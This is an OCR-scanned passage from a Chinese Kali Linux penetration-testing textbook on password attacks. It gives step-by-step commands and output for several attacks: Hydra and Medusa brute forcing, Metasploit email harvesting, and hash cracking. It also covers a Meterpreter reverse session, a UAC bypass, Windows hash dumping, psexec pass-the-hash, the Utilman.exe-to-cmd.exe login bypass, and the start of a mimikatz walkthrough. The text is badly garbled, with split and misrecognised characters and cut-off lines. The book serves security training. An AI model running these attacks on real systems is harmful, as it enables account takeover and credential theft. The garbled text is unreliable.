并 打开 目标 系统 的 Shell， 如 图 7.31 所 示 。 


asf auxiliary(browser_autopen) | 
Starting interaction with 1... 


shell 


| Failed to spawn shell with thread impersonation, Retrying without it, 
45? created, 


H | C PŪ spf t Windows A P [ aa 9 me | Nu it) ] 
iC) B8BBB 1965-2001 Microsoft Corp, 


C:\Documents and Settings\Test \e6>gj 





图 7.31 Shell 窗 口 
(9) 从 该 界面 可 以 看 到 成 功 连接 到 了 一 个 远程 会 话 。 


第 8 革 ”密码 攻击 


密码 攻击 束 吓 在 不 知道 密 钥 的 情况 下 ， 恢 复出 密码 明文 。 密 码 攻 击 是 所 有 渗透 测试 
的 一 个 重要 部 分 。 如 果 作 为 一 个 渗透 测试 人 员 ， 不 了 解密 码 和 窗 码 破解 ， 简 下 无 法 
想象 。 所 以 无 论 做 什么 或 我 们 的 技术 能 力 到 了 什么 程度 ， 密 码 似 乎 仍然 是 保 扩 数据 
和 限制 系统 访问 权限 的 最 部 用 方法 。 本 章 将 介绍 各 种 密码 攻击 方法 ， 如 密码 在 线 攻 
击 、 路 由 器 密码 攻击 和 创建 密码 字典 等 。 


8.1 密码 在 线 破 解 


为 了 使 用 户 能 成 功 登 录 到 目标 系统 ， 所 以 需要 获取 一 个 正确 的 密码 。 在 Kali 中 ， 在 
线 破 解密 码 的 工具 很 多 ， 其 中 最 背 用 的 两 款 分 别 是 Hydra 和 Medusa。 本 节 将 介绍 使 
用 Hydra 和 Medusa 工 具 实 现 密码 在 线 破 解 。 


8.1.1 Hydra 工 具 


Hydra 是 一 个 相当 强大 的 暴力 密码 破解 工具 。 该 工具 文 持 几乎 所 有 协议 的 在 线 密码 
破解 ， 如 FTP、HTTP、HTTPS、MySQL、MS SQL, Oracle, Cisco, IMAP#I 
VNC 等 。 其 密码 能 否 被 破解， 关键 在 于 字典 是 否 足够 强大 。 很 多 用 户 可 能 对 Hydra 
比较 熟悉 ， 因 为 该 工具 有 图 形 界面 ， 且 操作 十 分 简单 ， 基 本 上 可 以 “傻瓜 "操作 。 下 
面 将 介绍 使 用 Hydra 工 具 破 解 在 线 密 码 。 


使 用 Hydra 工 具 破 解 在 线 密码 。 具 体操 作 步 又 如 下 所 示 。 


(1) 启动 Hydra 攻 击 。 在 Kali 昌 面 依次 选择 “应 用 程序 ”|Kali Linux "密码 攻击 站 在 线 
攻击 "|hydra-gtk 命 仿 ， 将 显示 如 图 8.1 所 示 的 界面 。 


xHydra = as T 





退出 (G) 
Target Passwords Tuning Specific Start 


Target 


O Single Target 192.168.41.142 | 











© Target List | | 


|] Prefer IPV6 





Port lo 





Protocol | mysql | v 





| 


Output Options 


|| Use SSL L] Be Verbose 


v; Show Attempts || Debug 


hydra -V -L c -P /usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-pass... 


图 8.1 BaF 


(2) 该 界面 用 于 设置 目标 系统 的 地 址 、 端 口 和 协议 等 。 如 果 要 查看 密码 攻击 的 过 
程 ， 将 Output Options 框 中 的 Show Attempts 复 选 框 勾 上 。 在 该 界面 单 击 Passwords 
选项 卡 ， 将 显示 如 图 8.2 所 示 的 界面 。 


xHydra = | | X | 
退出 (@) 
| Target | Passwords | Tuning Specific Start 


Username 


























O Username yourname 


(& Username List 





“| Loop around users 


Password 


©) Password | yourpass 


(€ Password List Isswd/passwds/john.txt | 


Colon separated file 


LI Use Colon separated file ] 











L Try login as password “| Try empty password 


I 


hydra -L /usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/nam... 


























图 8.2 指定 密码 字典 


(3) 在 该 界面 指定 用 户 名 和 窗 码 列表 文件 。 本 例 中 使 用 Kali 系 统 中 存在 的 用 户 名 和 
密码 列表 文件 ， 并 选择 Loop around users 选 项 。 其 中 ， 用 户 名 和 密码 文件 分 别 保存 
在 /usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/names/nameslist.txt 
和 /usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/john.txt 中 。 


(4) 设置 好 密码 字典 后 ， 单 击 Tuning 选 项 卡 ， 将 显示 如 图 8.3 所 示 的 界面 。 


xHydra 
18 44 (Q) 








Target Passwords Tuning Specific Start 


Performance Options 





Number of Tasks | 2 一 | 
Timeout |15 Z 
V Exit after first found pair 
Use a HTTP/HTTPS Proxy 
© No Proxy O HTTP Method O CONNECT Method 
Proxy ihttp://1 21.0.0.1:8080 | 


LJ Proxy needs authentication 





Username |yourname 


Password | yourpass | 


hydra -L c -P /usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd... 








图 8.3 基本 设置 


(5) 在 该 界面 设置 任务 的 编号 和 超时 时 间 。 如 果 运 行 任务 太 多 的 话 ， 服 务 的 响应 
速率 将 下 降 。 所 以 要 建议 将 原来 默认 的 任务 编号 16 修 改 为 2， 超 时 时 间 修 改 为 15。 
然后 将 Exit after first found pair 的 复 选 框 勾 上 ， 表 示 找 到 第 一 对 匹配 项 时 则 停止 攻 
ihe 


(6) 以 上 的 配置 都 设置 完 后 ， 单 击 到 Start 选 项 卡 进行 攻击 ， 如 图 8.4 所 示 。 


大 学 霸 Kali Linux 安全 渗透 教程 





xHydra 






Tuning | Specific Start | 




















| Clear C Output 


hydra -V - L, /usr/share/wfuzz/wordlist/fuzzdb/wordlists- -user-passwd/... 


图 8.4 攻击 界面 


(7) 在 该 界面 显示 了 四 个 按钮 ， 分 别 是 启动 、 俘 止 、 保 存 输出 和 清除 输出 。 


单 击 Start 按 钮 开始 攻击 ， 攻 击 过 程 如 图 8. SHR. 


| xHydra les ti 
| — — R 


























| Target | Passwords LS tan Specific: Start 


|-Output 
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only 
































Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-08 17:19:09 
[DATA] 2 tasks, 1 server, 5926956 login tries ([:1907/p:3108), - 2963478 tries per task 
[DATA] attacking service mysql on port 3306 
[ATTEMPT] target 192.168.41.142 - login 0 - pass" - 1 of 5926956 [child 0] 
[ATTEMPT] target 192.168.41.142 - login "0" - pass "12345" - 2 of 5926956 [child 1] 
[ATTEMPT] target 192.168.41.142 - Login "root" - pass "12345" - 2 of 5931972 [child 1] 
[ATTEMPT] target 192.168.41.142 - login "root" - pass "abc123" - 3 of 5931972 [child 1] 


[3306][mysql] host: 192.168.41.142 login: root password: 
«finished» 


























hydra -V i -user- ER S txt -. 


图 8.5 攻击 过 程 


8.1 密码 在 线 人 破解 


343 


(8) xHydra 工 具 根 据 目 定 的 用 户 名 和 窗 码 文件 中 的 条 目 ， 进 行 匹 配 。 当 找到 匹配 


的 用 户 名 和 窗 码 时 ， 则 停止 攻击 ， 如 图 8.5 所 示 。 


8.1.2 Medusa 工 具 


Medusa 工 具 是 通过 并 行 登录 暴力 破解 的 方法 ， 党 试 获取 远程 验证 服务 访问 权限 。 
Medusa 能 够 验证 的 远程 服务 ， 如 AFP、FTP、HTTP、IMAP、MS SQL, 
NetWare, NNTP, PcAnyWhere, POP3, REXEC, RLOGIN, SMTPAUTH, 
SNMP, SSHv2, Telnet, VNC#1Web Form 等 。 下 面 籽 介绍 使 用 Medusa 工 具 获 取 
路 由 器 的 访问 权 。 


启动 Medusa 工 具 。 在 终端 直接 运行 nedusa 人 命令， 如 下 所 示 : 


root@kali:~# medusa 


或 者 在 桌面 上 依次 选择 “应 用 程序 ”|Kali Linux aAA A ERA” medusa S, 
将 俞 出 如 下 所 示 的 信息 


Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net> 
medusa: option requires an argument -- 'h' 

CRITICAL: Unknown error processing command-line options. 

ALERT: Host information must be supplied. 

syntax: Medusa [-h host|-H file] [-u username]|-U file] [-p password|-P file] [-C file] -M module 


[OPT] 

-h[TEXT]  :Target hostname or IP address 

-H [FILE] : File containing target hostnames or IP addresses 

-u [TEXT]  : Username to test 

-U [FILE] : File containing usernames to test 

-p [TEXT] | : Password to test 

-P [FILE]  :File containing passwords to test 

-C [FILE] : File containing combo entries. See README for more information. 

-O [FILE] : File to append log information to 

-e [n/s/ns] — : Additional password checks ([n] No Password, [s] Password = Username) 

-M [TEXT] : Name of the module to execute (without the .mod extension) 

-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a 
different parameter each time and they will all be sent to the module (i.e. 
-m Param’ -m Param2, etc.) 

-d : Dump all known modules 

-n [NUM] ; Use for non-default TCP port number 

-5 : Enable SSL 

-g [NUM] : Give up after trying to connect for NUM seconds (default 3) 

-r [NUM] : Sleep NUM seconds between retry attempts (default 3) 

-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be 

NUM + 1. 

-t [NUM] : Total number of logins to be tested concurrently 

-T [NUM] : Total number of hosts to be tested concurrently 

-L : Parallelize logins using one username per thread. The default is to process 
the entire username before proceeding. 

-f : Stop scanning host after first valid username/password found. 

-F : Stop audit after first valid username/password found on any host. 

-b : Suppress startup banner 

-q Display module's usage information 

-w [NUM] : Verbose level [0 - 6 (more)] 

-w [NUM] : Error debug level [0 - 10 (more)] 

-V ; Display version 


: Resume scan based on map of previous scan 


以 上 输出 的 信息 显示 了 medusa 命 命 的 帮助 信息 。 包 括 meduas 命 命 的 语法 、 可 使 用 


的 选项 及 人 参数。 用 户 可 以 根据 上 自己 的 需要 ， 


下 面 看 一 个 例子 的 运行 结 


/小 


选择 相应 的 选项 获取 路 由 器 的 访问 权 。 


【实例 8-1】 使 用 medusa 暴 力 破解 地 址 为 192.168.5.1 的 路 由 器 ， 执 行 命 合 如 下 所 


root@kali:~# medusa -h 192.168.5.1 -u admin -P /usr/share/wfuzz/woi 
passwd/passwds/john.txt -M http -e ns 80 -F 
Medusa v2.0 [http://www.foofus.net ] 


ACCOUNT CHECK: [http] Host: 192. 
ACCOUNT CHECK: [http] Host: 192. 
ACCOUNT CHECK: [http] Host: 192. 
ACCOUNT CHECK: [http] Host: 192. 
ACCOUNT CHECK: [http] Host: 192. 
ACCOUNT CHECK: [http] Host: 192. 
ACCOUNT CHECK: [http] Host: 192. 
ACCOUNT CHECK: [http] Host: 192. 
ACCOUNT FOUND: [http] Host: 192. 


168. 
168. 
168. 
168. 
168. 
168. 
168. 
168. 
168. 


(C) 


Ol 
H 


OANA aA A 
HHÁBbHBHmBHHH 


JoMo-Kun / Foofus Networks 
(1 of 1, 0 complete) User: 
(1 of 1, © complete) User: 
(1 of 1, © complete) User: 
(1 of 1, 0 complete) User: 
(1 of 1, © complete) User: 
(1 of 1, 0 complete) User: 
(1 of 1, 0 complete) User: 
(1 of 1, 0 complete) User: 
User: admin Password: daxut 


以 上 输出 的 信息 是 破解 路 由 器 密码 的 一 个 过 程 。 一 般 路 由 器 默认 的 用 户 名 和 密码 都 
是 admin。 但 是 通 党 ， 用 户 会 料 密码 进行 修改 。 所 以 这 里 指定 一 个 密码 字典 
john.txt， 通 过 该 字典 对 路 由 器 进行 暴力 破解 。 从 最 后 一 行 输出 的 信息 ， 可 以 看 到 路 


由 器 的 用 户 名 和 密码 分 别 为 admin 和 daxueba。 





8.2 分 析 密 三 


在 实现 密码 破解 之 前 ， 介 绍 一 下 如 何 分 析 密 码 。 分 析 密 码 的 目的 是 ， 通 过 从 目标 系 
统 、 组 织 中 收集 信息 来 获得 一 个 较 小 的 密码 字典 : 本 节 将 介绍 使 用 Ettercap 工 具 或 
MSFCONSOLE 来 分 析 密 码 。 


8.2.1 Ettercap 工 具 


Ettercap 是 Linux 下 一 个 强大 的 欺骗 工具 ， 也 适用 于 Windows。 用 户 能 够 使 用 
Ettercap 工 具 快 速 地 创建 伪造 的 包 ， 各 适配器 到 应 用 软件 各 种 级 别 的 包 ， 
线 定 监听 数据 到 一 个 本 地 闯 口 等 。 下 面 将 介绍 Ettercap 工 具 的 使 用 。 


使 用 Ettercap 分 析 密 码 的 具体 操作 步骤 如 下 所 示 。 
(1) 配置 Ettercap 的 配置 文件 etter conf。 首 先 使 用 locate 人 命令 查找 到 Ettercap 配 置 
文件 保存 的 人 位置。 执行 命 分 如 下 所 示 : 


root@kali:~# locate etter.conf 
/etc/ettercap/etter.conf 
/Uusr/share/man/man5/etter.conf.5.gz 


从 以 上 输出 信息 中 ， 可 以 看 到 Ettercap 配 置 文件 etterconf 保 存在 /etc/ettercap/ 中 。 


(2) 使 用 VIM 编辑 etterconf 配 置 文件 。 将 该 文件 中 ec_uid 和 ec gid 配置 项 值 修改 为 
0， 并 将 Linux 部 分 附近 IPTABLES 行 的 注释 去 掉 。 修 改 结果 如 下 所 示 : 


root@kali:~# vi /etc/ettercap/etter.conf 


# nobody is the default 
# nobody is the default 


# if you use iptables: 
redir command on = "iptables -t nat -A PREROUTING -i %iface -p t€ 
redir command off = "iptables -t nat -D PREROUTING -i %iface -p ! 


BH rcc— nes] 


(3) 和 启动 Ettercap。 使 用 Ettercap 命 令 的 -G 选 项 ， 启 动 图 形 界面 。 执 行 命令 如 下 所 
A 





root@kali:~# ettercap -G 


执行 以 上 命令 后 ， 将 显示 如 图 8.6 所 示 的 界面 。 


ettercap 0.8.0 


File Smff Options ? 








8.6 Ettercap 初 始 界面 


(4) 通过 使 用 中 间 人 攻击 的 方式 ， 收 集 目标 系统 上 的 各 种 重要 信息 。 通 过 这 些 信 
恩 来 构建 可 能 的 密码 字典 。 关于 使 用 Ettercap 实 现 中 间 人 人 攻击， 在 第 7 草 已 详细 介 
A, APETA AW, 


8.2.2 使 用 MSFCONSOLE 分 析 密 码 


使 用 Metasploit MSFCONSOLE 的 search_email collector 模 块 分 析 密 码 。 通 过 该 模 
块 可 以 搜集 一 个 组 织 相关 的 各 种 邮件 信息 。 这 些 邮 件 信息 有 助 于 构建 用 户 字 典 。 具 
体操 作 步 又 如 下 所 示 。 


(1) 使 用 MSFCONSOLE。 执行 命令 如 下 所 示 : 


root@kali:~# msfconsole 
msf > 


(2) 查询 search email collector 模 块 。 执 行 命 令 如 下 所 示 : 


msf > search email collector 
[!] Database not connected or cache not built, using slow search 
Matching Modules 


Name Disclosure Date Rank Description 


WERE ET D email collector normal search Engine Das Email Address Collector 
msf > 


执行 以 上 命令 后 ， 在 输出 结果 中 看 到 以 上 信息 ， 融 表示 存在 search_email_collector 
模块 。 


(3) 使 用 辅助 模块 search_email collector。 执 行 命 令 如 下 所 示 : 


msf > use auxiliary/gather/search_email_collector 
msf auxiliary(search_email_collector) > 


输出 的 信息 表示 ， 已 切换 到 search_email_collector 模 块 。 
(4) 查看 search_email_collector 模 块 下 有 效 的 选项 。 执 行 命 分 如 下 所 示 : 


msf auxiliary(search email collector) > show options 
Module options (auxiliary/gather/search email collector): 


Name Current Setting Required Description 

DOMAIN yes The domain name to locate email addresses for 
OUTFILE no A filename to store the generated email list 
SEARCH BING true yes Enable Bing as a backend search engine 
SEARCH GOOGLE true yes Enable Google as a backend search engine 
SEARCH YAHOO true yes Enable Yahoo! as a backend search engine 


输出 的 信息 显示 了 search_email_collector 模 块 中 有 效 的 配置 选项 ， 根 据 用 户 自己 的 
" 况 配 置 相应 的 选项 。 


(5) 下 面 分 别 配 置 DOMAIN 和 OUTFILE 选 项 ， 如 下 所 示 : 


msf auxiliary(search_email_collector) > set DOMAIN gmail.com 
domain => gmail.com 

msf auxiliary(search email collector) > set outfile /root/Desktop/! 
outfile => /root/Desktop/fromwillie.txt 





(6) BUBBLE. WITT RB : 


msf auxiliary(search_email_collector) > run 

[*] Harvesting emails .... 

[^] Searching Google for email addresses from gmail.com 
[*] Extracting emails from Google search results... 

[^] Searching Bing email addresses from gmail.com 

[^] Extracting emails from Bing search results.. 

[^] Searching Yahoo for email addresses from gmail.com 
[*] rasvin.2470gmail.com 
[*] read.jeff@gmail.com 
[^] restore.adoreQgmail.com 
[*] rhetoricguyQgmail.com 
[*] sammyQgmail.com 

[^] signaturetitleservicesQgmail.com 
[*] smplustbQgmail.com 

[*] starfyi@gmail.com 

[*] taylorhanssonQgmail.com 

[*] thanhtam.hrQgmail.com 

[*] theidleagueQgmail.com 

[*] tjarkseQgmail.com 

[*] toniQgmail.com 

[^] userQgmail.com 

[*] vintageheadboardsQgmail.com 

[*] vlyubish270@gmail.com 

[*] webuyrarebooksQgmail.com 

[*] yavmamemogamesQgmail.com 

[*] yoyonorfcackQgmail.com 

[^] Writing email address list to /root/Desktop/fromwillie.txt.. 
[^] Auxiliary module execution completed 


全 出 的 信息 显示 了 所 有 gmail.cm 的 邮箱 地 址 ， 并 且 闻 所 有 信息 保存 在 fromwillie.txt 
文件 中 。 此 时 用 户 可 以 根据 收集 到 的 邮箱 用 户 人 信息， 猜测 它 的 密码 。 


8.2.3 哈 希 值 识别 工具 Hash Identifier 


哈 希 值 是 使 用 HASH 算 法 通过 逻辑 运算 得 到 的 数值 。 不 同 的 内 容 使 用 HASH 算 法 运 
算 后 ， 得 到 的 哈 希 值 不 同 。 下 面 将 介绍 使 用 Hash Identifier 工具 识别 哈 希 值 的 加 密 
方式 。 


(1) 启动 hash-identifier 命 爷 。 在 图 形 界面 依次 选择 “应 用 程序 ”|Kali Linux Raw 
击 离线 攻击 ”|hash-identifier 命 爷 ， 将 显示 如 下 所 示 的 信息 : 





By Zion3R# 
www.Blackploit.com # 
BETIERE com " 





从 输出 的 信息 中 看 到 HASH: 提 示 符 ， 就 表示 成 功 打 开 了 hash-identifier 命 合 的 终 蜥 。 
此 时 ， 攻 击 时 就 有 LM 加 密 的 哈 希 值 。 


(2) 攻击 6bcec2ba2597f089189735afeaa300d4 哈 希 值 。 执 行 命令 如 下 所 示 : 


HASH: 6bcec2ba2597f089189735afeaa300d4 
Possible Hashs: 
[+] MD5 
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower ($user 
Least Possible Hashs: 
[+] RAdmin v2.x 
[+] NTLM 
[+] MD4 
[+] MD2 
[+] MD5(HMAC) 
[+] MD4(HMAC) 


a] | 有 





从 输出 的 信息 中 ， 可 以 看 到 6bcec2ba2597f089189735afeaa300d4 哈 希 值 可 能 是 使 
用 MD5 加 密 的 。 


8.3 破解 LM Hashes 密 码 


LM (LAN Manager) Hash 是 Windows 操 作 系 统 最 早 使 用 的 密码 哈 希 算法 之 一 。 在 
Windows 2000、XP、Vista 和 Windows 7 中 使 用 了 黑 先 进 的 NTLMv2 之 前 ， x 
一 可 用 的 版 本 。 这 些 新 的 操作 系统 虽然 可 以 支持 使 用 LM 哈 希 ， 但 主要 是 为 了 提供 向 
后 兼容 性 。 不 过 在 Windows Vista 和 Windows 7 中 ， 该 算法 默认 是 被 禁用 的 。 本 节 
将 介绍 如 何 破解 LM Hashes 密 码 。 


{Kali Linux 中 ， 可 以 使 用 findmyhash 工 具 破 解 LM Hashes 密 码 。 其 中 ， 
findmyhash 命 全 的 语法 格式 如 下 所 示 : 


findmyhash <Encryption> -h hash 


以 上 语法 中 ， 各 个 选项 含义 如 下 所 示 。 


e Encryption : 指定 使 用 的 哈 希 加 密 类 型 。 
e -h : 指定 要 破解 的 LM 哈 希 值 。 


【实例 8-2】 使 用 findmyhash 命 全 攻击 LM Hashes z. WTM DA FPA : 


root@kali:~# findmyhash MD5 -h 5f4dcc3b5aa765d61d8327deb882cf99 
Cracking hash: 5f4dcc3b5aa765d61d832/7deb882cf99 
Analyzing with md5hood (http://md5hood.com).. 

. hash not found in md5hood 

Analyzing with stringfunction (http://www.stringfunction.com ).. 
. hash not found in stringfunction 

Analyzing with 99k.org (http://xanadrel.99k.org)... 

. hash not found in 99k.org 

Analyzing with sans (http://isc.sans.edu).. 

. hash not found in sans 

Analyzing with bokehman (http://bokehman.com)... 

. hash not found in bokehman 

Analyzing with goog.li (http://goog.li).. 

. hash not found in goog.li 

Analyzing with schwett (http://schwett.com).. 

. hash not found in schwett 

Analyzing with netmd5crack (http://www.netmd5crack.com)... 
. hash not found in netmd5crack 

Analyzing with md5-cracker (http://www.md5-cracker.tk).. 
. hash not found in md5-cracker 

Analyzing with benramsey (http://tools.benramsey.com).. 

. hash not found in benramsey 

Analyzing with gromweb (http://md5.gromweb.com).. 

***** HASH CRACKED!! ***** 

The original string is: password 

The following hashes were cracked: 


5f4dcc3b5aa/765d61d8327deb882cf99 -> password 


以 上 输出 的 信息 是 攻击 LM Hashes 密 码 的 过 程 。 经 过 一 番 的 攻击 ， 最 后 获取 到 哈 希 
值 5f4dcc3b5aa765d61d8327deb882cf99 的 原始 密码 是 password。 


如 果 觉 得 破解 LM Hashes 太 慢 的 话 ， 可 以 使 用 Metasploit 中 的 psexec 模 块 绕 过 Hash 
值 。 下 面料 介绍 使 用 psexec 模 块 绕 过 Hash 值 的 方法 。 


(1) 通过 在 目标 主机 (Windows 7) 上 运行 Veil 创 建 的 可 执行 文件 backup.exe， 成 
功 获取 一 个 活跃 的 远程 会 话 ， 如 下 所 示 : 


[^] Started reverse handler on 192.168.6.103:4444 
[*] Starting the payload handler... 

[*] Sending stage (769536 bytes) to 192.168.6.106 
[*] 


Meterpreter session 1 opened (192.168.6.103:4444 -> 192.168.6.: 





从 以 上 信息 中 ， 可 以 看 到 成 功 打开 了 会 话 1。 
(2) 查看 用 户 权 限 信息 。 执 行 合 分 如 下 所 示 : 


meterpreter > getuid 
Server username: WIN-RKPKQFBLG6CNlyw 


从 输出 的 信息 中 ， 可 以 看 到 该 用 户 的 权限 是 一 个 普通 权限 。 接 下 来 ， 使 用 
bypassuac 模 块 绕 过 UAC。 


(3) 设置 lyw 用 户 绕 过 UAC。 执 行 命令 如 下 所 示 : 


meterpreter > background 


[*] 
msf 
msf 


Backgrounding session 1.. 
exploit(handler) > use exploit/windows/local/bypassuac 
exploit(bypassuac) > set session 1 


session => 1 


msf 


[*] 


[ 
[ 
[ 
[ 
Im 


exploit(bypassuac) » exploit 

Started reverse handler on 192.168.6.103:4444 

UAC is Enabled, checking level.. 

UAC is set to Default 

BypassUAC can bypass this setting, continuing.. 

Part of Administrators group! Continuing.. 

Uploaded the agent to the filesystem... 

Uploading the bypass UAC executable to the filesystem... 
Meterpreter stager executable 73802 bytes long being uploaded. 
Sending stage (769536 bytes) to 192.168.6.106 

Meterpreter session 3 opened (192.168.6.103:4444 -> 192.168.6.: 


eterpreter » getsystem 


.got system (via technique 1). 
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM 


5 ——] 





从 输出 的 信息 中 ， 可 以 看 到 此 时 lyw 用 户 权 限 已 经 为 SYSTEM。 
(4) 查看 目标 主机 上 所 有 用 户 的 哈 希 密码 值 。 执 行 命 令 如 下 所 示 : 


erpreter > run post/windows/gather/hashdump 


Obtaining the boot key... 

Calculating the hboot key using SYSKEY 45fa5958a01cf2b66b73daa: 
Obtaining the user list and keys... 

Decrypting user keys... 

Dumping password hints... 


Test:"123" 


[*] 


Dumping password hashes... 


Administrator :500:aad3b435b51404eeaad3b435b51404ee: 31d6cfe0d16ae93: 
Guest :501:aad3b435b51404eeaad3b435b51404ee: 31d6cfe0d16ae931b73c59d | 
Test:1001:aad3b435b51404eeaad3bA435b51404ee:32ed87bdb5fdc5e9cba8854. 
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:daf26fce5b47e( 
lyw:1003:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547.: 
alice:1004:aad3b435b51404eeaad3b435b51404ee:22315d6ed1a7d5f8a7c98c: 


E EM 





从 输出 的 信息 中 ， 可 以 看 到 捕获 到 六 个 用 户 的 哈 希 密码 值 。 此 时 ， 可 以 使 用 SMB 
psexec 模 块 绕 过 Hash 值 。 


(5) 后 台 运 行 会 话 2。 执 行 命 分 如 下 所 示 : 


meterpreter > background 
[*] Backgrounding session 2.. 


m 


(6) 使 用 SMB psexec 模 块 ， 并 设置 需要 的 配置 选项 参数 。 执 行 命令 如 下 所 示 : 


msf exploit(bypassuac) > use exploit/windows/smb/psexec 

msf exploit(psexec) > set RHOST 192.168.6.114 # 设 置 远程 主机 地 址 
RHOST => 192.168.6.114 

msf exploit(psexec) > set SMBUser Test 4j IE SMBH P 
SMBUser => alice 

msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee 
22315d6ed1a7d5f8a7c98c40e9fa2dec # 设 置 SMB 窗 码 
SMBPass => aad3b435b51404eeaad3b435b51404ee : 22315d6ed1a/d5f8a/c98c- 


al 一 一 一 





(7) 启动 攻击 。 执 行 命 分 如 下 所 示 : 


exploit(psexec) > exploit 
Started reverse handler on 192.168.6.103:4444 
Connecting to the server... 


msf 

[ 

[ 

[^] Authenticating to 192.168.6.114:445|WORKGROUP as user 'lyw'.. 
[^] Uploading payload.. 

[^] Created \XBotpcOY. exe... 

[*] Deleting \XBotpcOY. exe... 

[*] Sending stage (769536 bytes) to 192.168.6.114 

[^] Meterpreter session 3 opened (192.168.6.103:4444 -> 192.168.6.: 





从 输出 的 信息 中 ， 可 以 看 到 使 用 “Test" 用 户 成 功 的 打开 了 一 个 会 话 。 


8.4 2% 31 Utilman s x 


Utilman 是 Windows 辅 助 工 具 管 理 器 。 该 程序 是 存放 在 Windows 系 统 文 件 中 最 重要 
的 文件 ， 通 常情 况 下 是 在 安装 系统 过 程 中 自动 创建 的 ， 对 于 系统 正常 运行 来 说 至 关 
重要 。 在 Windows 下 ， 使 用 Windows+U 组 合 键 可 以 调用 Utilman 进 程 。 本 节 将 介绍 
绕 过 Utilman 程 序 登 录 系 统 ， 融 可 以 运行 其 他 操作 。 


(1) 在 Windows 界 面 ， 和 启动 Kali Linux LiveCD， 如 图 8.7 所 示 。 














Boot menu 


Live (666-pae) 

Live (bGb-pae failsafe} 

Live (forensic mode) 

Live USE Persistence (check Kkali.orgprst) 
Live USB Encrypted Persistence (check Kkali.orgprst) 
Install 


Press ENTER to boot or TAB to edit a menu entry 





8.7 Kali Linux8| $ 5 rà 


(2) 在 该 界面 选择 Live (686-pae) ， 按 下 回 车 键 即 可 启动 Kali Linux， 如 图 8.8 所 
7]vo 


Applications Places T Sat Jul 19, 5:17 PM 
Eg Home Folder 


mi 
P" BE Desktop 


| = Computer 


E Floppy Drive 


a Network 


Connect to Server 





图 8.8 Kali Linux 操 作 系 统 


(3) 在 该 界面 打开 Windows 文 件 系 统 。 在 Kali Linux 时 面 依次 选择 Places|43GB 
Filesystem 选 项 ， 将 打开 如 图 8.9 所 示 的 界面 。 这 里 的 43G 表 示 当 前 Windows 系 统 的 
磁盘 大 小 。 


24554E29854E26CAC 
File Edit View Go Bookmarks Help 
Devices € K] : = & Q Search 
—J 系统 保留 
¿l 120GB 一 
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LI Home Hecovery $Recycle.Bin System Volume 


ProgramData Program Files GM Download 


Information 
IN Desktop 


3] File System 





(Em s 
I [rash 
Users wina 2-loader Windows 


Network 





1l Browse Net 
Windows XP 专业 版 autoexec.bat config. sys 
图 8.9 Windows 和 磁盘 中 的 文件 和 文件 来 


(4) 该 界面 显示 了 Windows 操 作 系 统 中 的 文件 和 文件 夹 。 这 里 依次 打开 
Windows|System32 文 件 夹 ， 将 显示 如 图 8.10 所 示 的 内 容 。 


system32 


File Edit View Go Bookmarks Help 
ER pr 








Devices € EES SCS Windows [35:54 «M "9 |Q Search 
《人 保留 
J 系统 保留 usercpl.dll userenv.dll userinit.exe 
¿l 120 GB.. £ 
Computer T T T 
E Home uspl0.dll utildll. dll 
El Deskto d " 
P - = 
AJ File System 
- ' 8x4 ux theme. dll idf. 
@ Trash Utilman.exe | uudt. dll 
Network F - - 
Œ Browse Net... UXInit.dll uxtib. dll uxlibres. dill | 
ux «ms. dii ux theme ciii v7wvnaa rom 


图 8.10 System32 目 录 中 的 内 容 


(5) 在 该 文件 夹 中 找到 Utilman.exe 文 件 ， 将 该 文件 重 命名 为 Utilman.old。 然 后 复 
制 cmd.exe 文 件 ， 并 将 其 文件 名 修改 为 Utilman.exe。 


(6) 现在 关闭 KaliLinux， 并 启动 Windows 有 条 统 。 在 登录 界面 按 下 Windows+tu 组 合 
键 ， 将 显示 如 图 8.11 所 示 的 界面 。 














8.11 Windows 登 录 界 面 


(7) 从 该 界面 可 以 看 到 打开 一 个 命令 提示 符 窗 口 。 在 该 窗口 中 ， 可 以 执行 一 些 
DOS 命 爷 。 例 如 ， 使 用 whoami 命 命 查 看 用 户 人 信息， 将 显示 如 图 8.12 所 示 的 界面 。 





图 8.12 用 户 权 限 信息 


(8) 从 输出 的 界面 可 以 看 到 ， 当 前 用 户 拥有 最 高 的 权限 。 此 时 ， 殊 可 以 进行 任何 
的 操作 。 


学 习 了 绕 过 Utilman 登 录 后 ， 可 以 使 用 mimikatz 工 具 恢 复 目标 系统 锁定 状态 时 用 户 的 
密码 。 下 面料 介绍 使 用 mimikatz 工 具 ， 从 锁定 状态 恢复 密码 。 


在 操作 之 前 需要 做 一 些 准备 工作。 首先 从 http://blog.gentilkiwi.com/mimikatz 网 站 下 
载 mimikatz 工 具 ， 其 软件 包 名 为 mimikatz trunk.zip。 然 后 将 该 软件 包 解 压 ， 并 保存 
到 一 个 USB 磁 盘 中 。 本 例 中 ， 将 解压 的 文件 保存 到 优盘 的 mimikatz 目 录 中 。 


(1) 在 系统 中 安装 Utilman Bypass， 以 便 能 执行 一 些 命令 。 
(2) 在 锁定 桌面 的 Windows 桌 面 按 下 Windows+u 组 合 键 ， 如 图 8.13 所 示 。 


*. Windows A 





48.13 启动 命令 行 

默认 情况 下 使 用 Windows+u 组 合 键 启动 DOS 窗 口 后 ， 该 窗口 缓冲 区 的 高 度 是 30。 
当 输 出 的 数据 较 多 时 ， 将 看 不 到 所 有 的 内 容 。 所 以 需要 到 DOS 窗 口 的 属性 菜单 中 ， 
增加 窗口 的 高 度 ， 如 图 8.14 所 示 。 





屏幕 级 :中 区 大 小 
ERIS OD: 
高 度 Of): 

窗口 大 小 
EIE: 
eis Œ): 

gnis 


FL): 
ra 
VY 由 系统 定位 窗口 P) 

















图 8.14 属性 菜单 
